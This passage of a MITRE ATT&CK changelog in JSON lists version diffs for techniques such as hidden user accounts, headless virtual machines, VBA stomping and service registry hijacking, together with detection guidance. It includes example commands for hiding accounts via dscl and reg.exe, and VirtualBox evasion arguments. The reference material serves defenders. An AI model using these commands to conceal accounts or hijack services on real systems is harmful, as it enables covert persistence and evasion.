"x_mitre_permissions_required": [
"root",
"Administrator"
],
"x_mitre_platforms": [
"macOS",
"Windows"
],
"x_mitre_version": "1.1",
"detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_contributors']\": [\"Omkar Gudhate\"]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-10-14 20:22:03.625000+00:00\", \"old_value\": \"2020-07-31 17:42:43.768000+00:00\"}, \"root['description']\": {\"new_value\": \"Adversaries may use hidden users to mask the presence of user accounts they create or modify. Normal users may want to hide users when there are many users accounts on a given system or want to keep an account hidden from the other users on the system.\\n\\nIn macOS, every user account has a userID associated with it. When creating a user, you can specify the userID for that account. There is a property value in /Library/Preferences/com.apple.loginwindow called Hide500Users that prevents users with userIDs 500 and lower from appearing at the login screen. When using the [Create Account](https://attack.mitre.org/techniques/T1136) technique with a userID under 500 (ex: sudo dscl . -create /Users/username UniqueID 401) and enabling this property (setting it to Yes), an adversary can conceal user accounts. (Citation: Cybereason OSX Pirrit)\\n\\nIn Windows, adversaries may hide user accounts via settings in the Registry. For example, an adversary may add a value to the Windows Registry (via [Reg](https://attack.mitre.org/software/S0075) or other means) that will hide the user \\u201ctest\\u201d from the Windows login screen: reg.exe ADD 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\SpecialAccountsUserList' /v test /t REG_DWORD /d 0 /f.(Citation: FireEye SMOKEDHAM June 2021)(Citation: US-CERT TA18-074A)\", \"old_value\": \"Adversaries may use hidden users to mask the presence of user accounts they create. Every user account in macOS has a userID associated with it. When creating a user, you can specify the userID for that account.\\n\\nThere is a property value in /Library/Preferences/com.apple.loginwindow called Hide500Users that prevents users with userIDs 500 and lower from appearing at the login screen. When using the [Create Account](https://attack.mitre.org/techniques/T1136) technique with a userID under 500 (ex: sudo dscl . -create /Users/username UniqueID 401) and enabling this property (setting it to Yes), an adversary can conceal user accounts. (Citation: Cybereason OSX Pirrit).\", \"diff\": \"--- \\n+++ \\n@@ -1,3 +1,5 @@\\n-Adversaries may use hidden users to mask the presence of user accounts they create. Every user account in macOS has a userID associated with it. When creating a user, you can specify the userID for that account.\\n+Adversaries may use hidden users to mask the presence of user accounts they create or modify. Normal users may want to hide users when there are many users accounts on a given system or want to keep an account hidden from the other users on the system.\\n \\n-There is a property value in /Library/Preferences/com.apple.loginwindow called Hide500Users that prevents users with userIDs 500 and lower from appearing at the login screen. When using the [Create Account](https://attack.mitre.org/techniques/T1136) technique with a userID under 500 (ex: sudo dscl . -create /Users/username UniqueID 401) and enabling this property (setting it to Yes), an adversary can conceal user accounts. (Citation: Cybereason OSX Pirrit).\\n+In macOS, every user account has a userID associated with it. When creating a user, you can specify the userID for that account. There is a property value in /Library/Preferences/com.apple.loginwindow called Hide500Users that prevents users with userIDs 500 and lower from appearing at the login screen. When using the [Create Account](https://attack.mitre.org/techniques/T1136) technique with a userID under 500 (ex: sudo dscl . -create /Users/username UniqueID 401) and enabling this property (setting it to Yes), an adversary can conceal user accounts. (Citation: Cybereason OSX Pirrit)\\n+\\n+In Windows, adversaries may hide user accounts via settings in the Registry. For example, an adversary may add a value to the Windows Registry (via [Reg](https://attack.mitre.org/software/S0075) or other means) that will hide the user \\u201ctest\\u201d from the Windows login screen: reg.exe ADD 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\SpecialAccountsUserList' /v test /t REG_DWORD /d 0 /f.(Citation: FireEye SMOKEDHAM June 2021)(Citation: US-CERT TA18-074A)\"}, \"root['x_mitre_detection']\": {\"new_value\": \"This technique prevents a user from showing up at the log in screen, but all of the other signs of the user may still exist. For example, \\\"hidden\\\" users may still get a home directory and will appear in the authentication logs.\\n\\nMonitor processes and command-line events for actions that could be taken to add a new user and subsequently hide it from login screens. Monitor Registry events for modifications to the HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\SpecialAccountsUserList key.\", \"old_value\": \"This technique prevents the new user from showing up at the log in screen, but all of the other signs of a new user still exist. The user still gets a home directory and will appear in the authentication logs.\", \"diff\": \"--- \\n+++ \\n@@ -1 +1,3 @@\\n-This technique prevents the new user from showing up at the log in screen, but all of the other signs of a new user still exist. The user still gets a home directory and will appear in the authentication logs.\\n+This technique prevents a user from showing up at the log in screen, but all of the other signs of the user may still exist. For example, \\\"hidden\\\" users may still get a home directory and will appear in the authentication logs.\\n+\\n+Monitor processes and command-line events for actions that could be taken to add a new user and subsequently hide it from login screens. Monitor Registry events for modifications to the HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\SpecialAccountsUserList key.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}}, \"iterable_item_added\": {\"root['external_references'][2]\": {\"source_name\": \"FireEye SMOKEDHAM June 2021\", \"description\": \"FireEye. (2021, June 16). Smoking Out a DARKSIDE Affiliate\\u2019s Supply Chain Software Compromise. Retrieved September 22, 2021.\", \"url\": \"https://www.fireeye.com/blog/threat-research/2021/06/darkside-affiliate-supply-chain-software-compromise.html\"}, \"root['external_references'][3]\": {\"source_name\": \"US-CERT TA18-074A\", \"description\": \"US-CERT. (2018, March 16). Alert (TA18-074A): Russian Government Cyber Activity Targeting Energy and Other Critical Infrastructure Sectors. Retrieved June 6, 2018.\", \"url\": \"https://www.us-cert.gov/ncas/alerts/TA18-074A\"}, \"root['x_mitre_data_sources'][0]\": \"Command: Command Execution\", \"root['x_mitre_data_sources'][1]\": \"Windows Registry: Windows Registry Key Modification\", \"root['x_mitre_data_sources'][2]\": \"Process: Process Creation\", \"root['x_mitre_platforms'][1]\": \"Windows\"}}",
"previous_version": "1.0",
"version_change": "1.0 \u2192 1.1",
"description_change_table": "\n | Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | Adversaries may use hidden users to mask the presence of use | t | 1 | Adversaries may use hidden users to mask the presence of use |
| > | r accounts they create. Every user account in macOS has a us | > | r accounts they create or modify. Normal users may want to h | ||
| > | erID associated with it. When creating a user, you can speci | > | ide users when there are many users accounts on a given syst | ||
| > | fy the userID for that account. There is a property value i | > | em or want to keep an account hidden from the other users on | ||
| > | n <code>/Library/Preferences/com.apple.loginwindow</code> ca | > | the system. In macOS, every user account has a userID asso | ||
| > | lled <code>Hide500Users</code> that prevents users with user | > | ciated with it. When creating a user, you can specify the us | ||
| > | IDs 500 and lower from appearing at the login screen. When u | > | erID for that account. There is a property value in <code>/L | ||
| > | sing the [Create Account](https://attack.mitre.org/technique | > | ibrary/Preferences/com.apple.loginwindow</code> called <code | ||
| > | s/T1136) technique with a userID under 500 (ex: <code>sudo d | > | >Hide500Users</code> that prevents users with userIDs 500 an | ||
| > | scl . -create /Users/username UniqueID 401</code>) and enabl | > | d lower from appearing at the login screen. When using the [ | ||
| > | ing this property (setting it to Yes), an adversary can conc | > | Create Account](https://attack.mitre.org/techniques/T1136) t | ||
| > | eal user accounts. (Citation: Cybereason OSX Pirrit). | > | echnique with a userID under 500 (ex: <code>sudo dscl . -cre | ||
| > | ate /Users/username UniqueID 401</code>) and enabling this p | ||||
| > | roperty (setting it to Yes), an adversary can conceal user a | ||||
| > | ccounts. (Citation: Cybereason OSX Pirrit) In Windows, adve | ||||
| > | rsaries may hide user accounts via settings in the Registry. | ||||
| > | For example, an adversary may add a value to the Windows Re | ||||
| > | gistry (via [Reg](https://attack.mitre.org/software/S0075) o | ||||
| > | r other means) that will hide the user \u201ctest\u201d from the Windo | ||||
| > | ws login screen: <code>reg.exe ADD 'HKLM\\SOFTWARE\\Microsoft\\ | ||||
| > | Windows NT\\CurrentVersion\\Winlogon\\SpecialAccountsUserList' | ||||
| > | /v test /t REG_DWORD /d 0 /f</code>.(Citation: FireEye SMOKE | ||||
| > | DHAM June 2021)(Citation: US-CERT TA18-074A) |
-silent, -ignore-reboot), as well as those associated with running a headless (in the background with no UI) virtual instance (ex. VBoxManage startvm $VM --type headless).(Citation: Shadowbunny VM Defense Evasion) Similarly, monitoring command line arguments which suppress notifications may highlight potentially malicious activity (ex. VBoxManage.exe setextradata global GUI/SuppressMessages \"all\").\n\nMonitor for commands which enable hypervisors such as Hyper-V. If virtualization software is installed by the adversary, the Registry may provide detection opportunities. Consider monitoring for [Windows Service](https://attack.mitre.org/techniques/T1543/003), with respect to virtualization software. \n\nBenign usage of virtualization technology is common in enterprise environments, data and events should not be viewed in isolation, but as part of a chain of behavior.",
"x_mitre_is_subtechnique": true,
"x_mitre_permissions_required": [
"User"
],
"x_mitre_platforms": [
"Linux",
"macOS",
"Windows"
],
"x_mitre_version": "1.1",
"detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-10-14 22:21:59.708000+00:00\", \"old_value\": \"2020-07-06 19:03:40.330000+00:00\"}, \"root['x_mitre_detection']\": {\"new_value\": \"Consider monitoring for files and processes associated with running a virtual instance, such as binary files associated with common virtualization technologies (ex: VirtualBox, VMware, QEMU, Hyper-V). Consider monitoring the size of virtual machines running on the system. Adversaries may create virtual images which are smaller than those of typical virtual machines.(Citation: Shadowbunny VM Defense Evasion) Network adapter information may also be helpful in detecting the use of virtual instances.\\n\\nConsider monitoring for process command-line arguments that may be atypical for benign use of virtualization software. Usage of virtualization binaries or command-line arguments associated with running a silent installation may be especially suspect (ex. -silent, -ignore-reboot), as well as those associated with running a headless (in the background with no UI) virtual instance (ex. VBoxManage startvm $VM --type headless).(Citation: Shadowbunny VM Defense Evasion) Similarly, monitoring command line arguments which suppress notifications may highlight potentially malicious activity (ex. VBoxManage.exe setextradata global GUI/SuppressMessages \\\"all\\\").\\n\\nMonitor for commands which enable hypervisors such as Hyper-V. If virtualization software is installed by the adversary, the Registry may provide detection opportunities. Consider monitoring for [Windows Service](https://attack.mitre.org/techniques/T1543/003), with respect to virtualization software. \\n\\nBenign usage of virtualization technology is common in enterprise environments, data and events should not be viewed in isolation, but as part of a chain of behavior.\", \"old_value\": \"Consider monitoring for files and processes associated with running a virtual instance, such as binary files associated with common virtualization technologies (ex: VirtualBox, VMware, QEMU, Hyper-V). Consider monitoring for process command-line arguments that may be atypical for benign use of virtualization software. Usage of virtualization binaries or command-line arguments associated with running a headless (in the background with no UI) virtual instance may be especially suspect. Network adapter information may also be helpful in detecting the use of virtual instances.\\n\\nIf virtualization software is installed by the adversary, the Registry may provide detection opportunities. Consider monitoring for [Windows Service](https://attack.mitre.org/techniques/T1543/003), with respect to virtualization software. \\n\\nBenign usage of virtualization technology is common in enterprise environments, data and events should not be viewed in isolation, but as part of a chain of behavior.\", \"diff\": \"--- \\n+++ \\n@@ -1,5 +1,7 @@\\n-Consider monitoring for files and processes associated with running a virtual instance, such as binary files associated with common virtualization technologies (ex: VirtualBox, VMware, QEMU, Hyper-V). Consider monitoring for process command-line arguments that may be atypical for benign use of virtualization software. Usage of virtualization binaries or command-line arguments associated with running a headless (in the background with no UI) virtual instance may be especially suspect. Network adapter information may also be helpful in detecting the use of virtual instances.\\n+Consider monitoring for files and processes associated with running a virtual instance, such as binary files associated with common virtualization technologies (ex: VirtualBox, VMware, QEMU, Hyper-V). Consider monitoring the size of virtual machines running on the system. Adversaries may create virtual images which are smaller than those of typical virtual machines.(Citation: Shadowbunny VM Defense Evasion) Network adapter information may also be helpful in detecting the use of virtual instances.\\n \\n-If virtualization software is installed by the adversary, the Registry may provide detection opportunities. Consider monitoring for [Windows Service](https://attack.mitre.org/techniques/T1543/003), with respect to virtualization software. \\n+Consider monitoring for process command-line arguments that may be atypical for benign use of virtualization software. Usage of virtualization binaries or command-line arguments associated with running a silent installation may be especially suspect (ex. -silent, -ignore-reboot), as well as those associated with running a headless (in the background with no UI) virtual instance (ex. VBoxManage startvm $VM --type headless).(Citation: Shadowbunny VM Defense Evasion) Similarly, monitoring command line arguments which suppress notifications may highlight potentially malicious activity (ex. VBoxManage.exe setextradata global GUI/SuppressMessages \\\"all\\\").\\n+\\n+Monitor for commands which enable hypervisors such as Hyper-V. If virtualization software is installed by the adversary, the Registry may provide detection opportunities. Consider monitoring for [Windows Service](https://attack.mitre.org/techniques/T1543/003), with respect to virtualization software. \\n \\n Benign usage of virtualization technology is common in enterprise environments, data and events should not be viewed in isolation, but as part of a chain of behavior.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}}, \"iterable_item_added\": {\"root['external_references'][3]\": {\"source_name\": \"Shadowbunny VM Defense Evasion\", \"description\": \"Johann Rehberger. (2020, September 23). Beware of the Shadowbunny - Using virtual machines to persist and evade detections. Retrieved September 22, 2021.\", \"url\": \"https://embracethered.com/blog/posts/2020/shadowbunny-virtual-machine-red-teaming-technique/\"}, \"root['x_mitre_contributors'][0]\": \"Johann Rehberger\"}}",
"previous_version": "1.0",
"version_change": "1.0 \u2192 1.1",
"changelog_mitigations": {
"shared": [
"M1038: Execution Prevention",
"M1042: Disable or Remove Feature or Program"
],
"new": [],
"dropped": []
},
"changelog_detections": {
"shared": [],
"new": [
"DS0009: Process (Process Creation)",
"DS0017: Command (Command Execution)",
"DS0019: Service (Service Creation)",
"DS0022: File (File Creation)",
"DS0024: Windows Registry (Windows Registry Key Modification)"
],
"dropped": []
}
},
{
"type": "attack-pattern",
"id": "attack-pattern--c898c4b5-bf36-4e6e-a4ad-5b8c4c13e35b",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2020-09-17 12:51:40.845000+00:00",
"modified": "2021-10-15 14:02:07.944000+00:00",
"name": "VBA Stomping",
"description": "Adversaries may hide malicious Visual Basic for Applications (VBA) payloads embedded within MS Office documents by replacing the VBA source code with benign data.(Citation: FireEye VBA stomp Feb 2020)\n\nMS Office documents with embedded VBA content store source code inside of module streams. Each module stream has a PerformanceCache that stores a separate compiled version of the VBA source code known as p-code. The p-code is executed when the MS Office version specified in the _VBA_PROJECT stream (which contains the version-dependent description of the VBA project) matches the version of the host MS Office application.(Citation: Evil Clippy May 2019)(Citation: Microsoft _VBA_PROJECT Stream)\n\nAn adversary may hide malicious VBA code by overwriting the VBA source code location with zero\u2019s, benign code, or random bytes while leaving the previously compiled malicious p-code. Tools that scan for malicious VBA source code may be bypassed as the unwanted code is hidden in the compiled p-code. If the VBA source code is removed, some tools might even think that there are no macros present. If there is a version match between the _VBA_PROJECT stream and host MS Office application, the p-code will be executed, otherwise the benign VBA source code will be decompressed and recompiled to p-code, thus removing malicious p-code and potentially bypassing dynamic analysis.(Citation: Walmart Roberts Oct 2018)(Citation: FireEye VBA stomp Feb 2020)(Citation: pcodedmp Bontchev)",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "defense-evasion"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1564/007",
"external_id": "T1564.007"
},
{
"source_name": "FireEye VBA stomp Feb 2020",
"description": "Cole, R., Moore, A., Stark, G., Stancill, B. (2020, February 5). STOMP 2 DIS: Brilliance in the (Visual) Basics. Retrieved September 17, 2020.",
"url": "https://www.fireeye.com/blog/threat-research/2020/01/stomp-2-dis-brilliance-in-the-visual-basics.html"
},
{
"source_name": "Evil Clippy May 2019",
"description": "Hegt, S. (2019, May 5). Evil Clippy: MS Office maldoc assistant. Retrieved September 17, 2020.",
"url": "https://outflank.nl/blog/2019/05/05/evil-clippy-ms-office-maldoc-assistant/"
},
{
"source_name": "Microsoft _VBA_PROJECT Stream",
"description": "Microsoft. (2020, February 19). 2.3.4.1 _VBA_PROJECT Stream: Version Dependent Project Information. Retrieved September 18, 2020.",
"url": "https://docs.microsoft.com/en-us/openspecs/office_file_formats/ms-ovba/ef7087ac-3974-4452-aab2-7dba2214d239"
},
{
"source_name": "Walmart Roberts Oct 2018",
"description": "Sayre, K., Ogden, H., Roberts, C. (2018, October 10). VBA Stomping \u2014 Advanced Maldoc Techniques. Retrieved September 17, 2020.",
"url": "https://medium.com/walmartglobaltech/vba-stomping-advanced-maldoc-techniques-612c484ab278"
},
{
"source_name": "pcodedmp Bontchev",
"description": "Bontchev, V. (2019, July 30). pcodedmp.py - A VBA p-code disassembler. Retrieved September 17, 2020.",
"url": "https://github.com/bontchev/pcodedmp"
},
{
"source_name": "oletools toolkit",
"description": "decalage2. (2019, December 3). python-oletools. Retrieved September 18, 2020.",
"url": "https://github.com/decalage2/oletools"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_contributors": [
"Rick Cole, Mandiant"
],
"x_mitre_data_sources": [
"Script: Script Execution",
"File: File Metadata"
],
"x_mitre_detection": "Detection efforts should be placed finding differences between VBA source code and p-code.(Citation: Walmart Roberts Oct 2018) VBA code can be extracted from p-code before execution with tools such as the pcodedmp disassembler. The oletools toolkit leverages the pcodedmp disassembler to detect VBA stomping by comparing keywords present in the VBA source code and p-code.(Citation: pcodedmp Bontchev)(Citation: oletools toolkit)\n\nIf the document is opened with a Graphical User Interface (GUI) the malicious p-code is decompiled and may be viewed. However, if the PROJECT stream, which specifies the project properties, is modified in a specific way the decompiled VBA code will not be displayed. For example, adding a module name that is undefined to the PROJECT stream will inhibit attempts of reading the VBA source code through the GUI.(Citation: FireEye VBA stomp Feb 2020)",
"x_mitre_is_subtechnique": true,
"x_mitre_permissions_required": [
"User"
],
"x_mitre_platforms": [
"Linux",
"Windows",
"macOS"
],
"x_mitre_system_requirements": [
"MS Office version specified in _VBA_PROJECT stream must match host"
],
"x_mitre_version": "1.1",
"detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-10-15 14:02:07.944000+00:00\", \"old_value\": \"2020-09-23 11:31:50.407000+00:00\"}, \"root['x_mitre_contributors'][0]\": {\"new_value\": \"Rick Cole, Mandiant\", \"old_value\": \"Rick Cole, FireEye\"}, \"root['x_mitre_data_sources'][1]\": {\"new_value\": \"File: File Metadata\", \"old_value\": \"File: File Content\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}}}",
"previous_version": "1.0",
"version_change": "1.0 \u2192 1.1",
"changelog_mitigations": {
"shared": [
"M1042: Disable or Remove Feature or Program"
],
"new": [],
"dropped": []
},
"changelog_detections": {
"shared": [],
"new": [
"DS0012: Script (Script Execution)",
"DS0022: File (File Metadata)"
],
"dropped": []
}
},
{
"type": "attack-pattern",
"id": "attack-pattern--17cc750b-e95b-4d7d-9dde-49e0de24148c",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2020-03-13 11:42:14.444000+00:00",
"modified": "2021-10-14 23:52:52.058000+00:00",
"name": "Services Registry Permissions Weakness",
"description": "Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts. Windows stores local service configuration information in the Registry under HKLM\\SYSTEM\\CurrentControlSet\\Services. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe, [PowerShell](https://attack.mitre.org/techniques/T1059/001), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through access control lists and user permissions. (Citation: Registry Key Security)(Citation: malware_hides_service)\n\nIf the permissions for users and groups are not properly set and allow access to the Registry keys for a service, adversaries may change the service's binPath/ImagePath to point to a different executable under their control. When the service starts or is restarted, then the adversary-controlled program will execute, allowing the adversary to establish persistence and/or privilege escalation to the account context the service is set to execute under (local/domain account, SYSTEM, LocalService, or NetworkService).\n\nAdversaries may also alter other Registry keys in the service\u2019s Registry tree. For example, the FailureCommand key may be changed so that the service is executed in an elevated context anytime the service fails or is intentionally corrupted.(Citation: Kansa Service related collectors)(Citation: Tweet Registry Perms Weakness)\n\nThe Performance key contains the name of a driver service's performance DLL and the names of several exported functions in the DLL.(Citation: microsoft_services_registry_tree) If the Performance key is not already present and if an adversary-controlled user has the Create Subkey permission, adversaries may create the Performance key in the service\u2019s Registry tree to point to a malicious DLL.(Citation: insecure_reg_perms)\n\nAdversaries may also add the Parameters key, which stores driver-specific data, or other custom subkeys for their malicious services to establish persistence or enable other malicious activities.(Citation: microsoft_services_registry_tree)(Citation: troj_zegost) Additionally, If adversaries launch their malicious services using svchost.exe, the service\u2019s file may be identified using HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\servicename\\Parameters\\ServiceDll.(Citation: malware_hides_service)",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "persistence"
},
{
"kill_chain_name": "mitre-attack",
"phase_name": "privilege-escalation"
},
{
"kill_chain_name": "mitre-attack",
"phase_name": "defense-evasion"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1574/011",
"external_id": "T1574.011"
},
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/478.html",
"external_id": "CAPEC-478"
},
{
"source_name": "Registry Key Security",
"description": "Microsoft. (2018, May 31). Registry Key Security and Access Rights. Retrieved March 16, 2017.",
"url": "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry-key-security-and-access-rights?redirectedfrom=MSDN"
},
{
"source_name": "malware_hides_service",
"description": "Lawrence Abrams. (2004, September 10). How Malware hides and is installed as a Service. Retrieved August 30, 2021.",
"url": "https://www.bleepingcomputer.com/tutorials/how-malware-hides-as-a-service/"
},
{
"source_name": "Kansa Service related collectors",
"description": "Hull, D.. (2014, May 3). Kansa: Service related collectors and analysis. Retrieved October 10, 2019.",
"url": "https://trustedsignal.blogspot.com/2014/05/kansa-service-related-collectors-and.html"
},
{
"source_name": "Tweet Registry Perms Weakness",
"description": "@r0wdy_. (2017, November 30). Service Recovery Parameters. Retrieved April 9, 2018.",
"url": "https://twitter.com/r0wdy_/status/936365549553991680"
},
{
"source_name": "microsoft_services_registry_tree",
"description": "Microsoft. (2021, August 5). HKLM\\SYSTEM\\CurrentControlSet\\Services Registry Tree. Retrieved August 25, 2021.",
"url": "https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree"
},
{
"source_name": "insecure_reg_perms",
"description": "Cl\u00e9ment Labro. (2020, November 12). Windows RpcEptMapper Service Insecure Registry Permissions EoP. Retrieved August 25, 2021.",
"url": "https://itm4n.github.io/windows-registry-rpceptmapper-eop/"
},
{
"source_name": "troj_zegost",
"description": "Trend Micro. (2012, October 9). TROJ_ZEGOST. Retrieved September 2, 2021.",
"url": "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_zegost"
},
{
"source_name": "Autoruns for Windows",
"description": "Mark Russinovich. (2019, June 28). Autoruns for Windows v13.96. Retrieved March 13, 2020.",
"url": "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_contributors": [
"Travis Smith, Tripwire",
"Matthew Demaske, Adaptforward"
],
"x_mitre_data_sources": [
"Windows Registry: Windows Registry Key Modification",
"Process: Process Creation",
"Service: Service Metadata",
"Command: Command Execution"
],
"x_mitre_defense_bypassed": [
"Application control"
],
"x_mitre_detection": "Service changes are reflected in the Registry. Modification to existing services should not occur frequently. If a service binary path or failure parameters are changed to values that are not typical for that service and does not correlate with software updates, then it may be due to malicious activity. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.\n\nTools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current service information. (Citation: Autoruns for Windows) Look for changes to services that do not correlate with known software, patch cycles, etc. Suspicious program execution through services may show up as outlier processes that have not been seen before when compared against historical data.\n\nMonitor processes and command-line arguments for actions that could be done to modify services. Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Services may also be changed through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), so additional logging may need to be configured to gather the appropriate data.",
"x_mitre_effective_permissions": [
"SYSTEM"
],
"x_mitre_is_subtechnique": true,
"x_mitre_permissions_required": [
"Administrator",
"User"
],
"x_mitre_platforms": [
"Windows"
],
"x_mitre_version": "1.1",
"detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-10-14 23:52:52.058000+00:00\", \"old_value\": \"2020-09-16 19:07:48.590000+00:00\"}, \"root['description']\": {\"new_value\": \"Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts. Windows stores local service configuration information in the Registry under HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Services. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe, [PowerShell](https://attack.mitre.org/techniques/T1059/001), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through access control lists and user permissions. (Citation: Registry Key Security)(Citation: malware_hides_service)\\n\\nIf the permissions for users and groups are not properly set and allow access to the Registry keys for a service, adversaries may change the service's binPath/ImagePath to point to a different executable under their control. When the service starts or is restarted, then the adversary-controlled program will execute, allowing the adversary to establish persistence and/or privilege escalation to the account context the service is set to execute under (local/domain account, SYSTEM, LocalService, or NetworkService).\\n\\nAdversaries may also alter other Registry keys in the service\\u2019s Registry tree. For example, the FailureCommand key may be changed so that the service is executed in an elevated context anytime the service fails or is intentionally corrupted.(Citation: Kansa Service related collectors)(Citation: Tweet Registry Perms Weakness)\\n\\nThe Performance key contains the name of a driver service's performance DLL and the names of several exported functions in the DLL.(Citation: microsoft_services_registry_tree) If the Performance key is not already present and if an adversary-controlled user has the Create Subkey permission, adversaries may create the Performance key in the service\\u2019s Registry tree to point to a malicious DLL.(Citation: insecure_reg_perms)\\n\\nAdversaries may also add the Parameters key, which stores driver-specific data, or other custom subkeys for their malicious services to establish persistence or enable other malicious activities.(Citation: microsoft_services_registry_tree)(Citation: troj_zegost) Additionally, If adversaries launch their malicious services using svchost.exe, the service\\u2019s file may be identified using HKEY_LOCAL_MACHINE\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\servicename\\\\Parameters\\\\ServiceDll.(Citation: malware_hides_service)\", \"old_value\": \"Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for registry to redirect from the originally specified executable to one that they control, in order to launch their own code at Service start. Windows stores local service configuration information in the Registry under HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Services. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe, [PowerShell](https://attack.mitre.org/techniques/T1059/001), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through Access Control Lists and permissions. (Citation: Registry Key Security)\\n\\nIf the permissions for users and groups are not properly set and allow access to the Registry keys for a service, then adversaries can change the service binPath/ImagePath to point to a different executable under their control. When the service starts or is restarted, then the adversary-controlled program will execute, allowing the adversary to gain persistence and/or privilege escalation to the account context the service is set to execute under (local/domain account, SYSTEM, LocalService, or NetworkService).\\n\\nAdversaries may also alter Registry keys associated with service failure parameters (such as FailureCommand) that may be executed in an elevated context anytime the service fails or is intentionally corrupted.(Citation: Kansa Service related collectors)(Citation: Tweet Registry Perms Weakness) \", \"diff\": \"--- \\n+++ \\n@@ -1,5 +1,9 @@\\n-Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for registry to redirect from the originally specified executable to one that they control, in order to launch their own code at Service start. Windows stores local service configuration information in the Registry under HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Services. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe, [PowerShell](https://attack.mitre.org/techniques/T1059/001), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through Access Control Lists and permissions. (Citation: Registry Key Security)\\n+Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts. Windows stores local service configuration information in the Registry under HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Services. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe, [PowerShell](https://attack.mitre.org/techniques/T1059/001), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through access control lists and user permissions. (Citation: Registry Key Security)(Citation: malware_hides_service)\\n \\n-If the permissions for users and groups are not properly set and allow access to the Registry keys for a service, then adversaries can change the service binPath/ImagePath to point to a different executable under their control. When the service starts or is restarted, then the adversary-controlled program will execute, allowing the adversary to gain persistence and/or privilege escalation to the account context the service is set to execute under (local/domain account, SYSTEM, LocalService, or NetworkService).\\n+If the permissions for users and groups are not properly set and allow access to the Registry keys for a service, adversaries may change the service's binPath/ImagePath to point to a different executable under their control. When the service starts or is restarted, then the adversary-controlled program will execute, allowing the adversary to establish persistence and/or privilege escalation to the account context the service is set to execute under (local/domain account, SYSTEM, LocalService, or NetworkService).\\n \\n-Adversaries may also alter Registry keys associated with service failure parameters (such as FailureCommand) that may be executed in an elevated context anytime the service fails or is intentionally corrupted.(Citation: Kansa Service related collectors)(Citation: Tweet Registry Perms Weakness) \\n+Adversaries may also alter other Registry keys in the service\\u2019s Registry tree. For example, the FailureCommand key may be changed so that the service is executed in an elevated context anytime the service fails or is intentionally corrupted.(Citation: Kansa Service related collectors)(Citation: Tweet Registry Perms Weakness)\\n+\\n+The Performance key contains the name of a driver service's performance DLL and the names of several exported functions in the DLL.(Citation: microsoft_services_registry_tree) If the Performance key 